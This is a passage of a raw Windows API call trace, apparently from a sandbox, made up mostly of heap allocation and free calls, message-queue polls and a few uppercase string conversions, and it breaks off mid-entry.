[0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.048] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0189.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.048] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.049] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0189.049] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.049] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0189.049] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0189.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0189.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0189.049] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0189.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.050] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.050] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.050] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.051] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.051] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.052] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.052] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0189.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0189.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0189.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0189.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0189.053] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0189.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0189.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0189.053] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0189.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0189.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bf8 [0189.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0189.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0189.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0189.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0189.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0189.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0189.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0189.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0189.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0189.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0189.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0189.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0189.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0189.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.056] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0189.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0189.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0189.056] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.056] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0189.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0189.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0189.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0189.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0189.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0189.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.057] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0189.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0189.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0189.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.058] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0189.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: 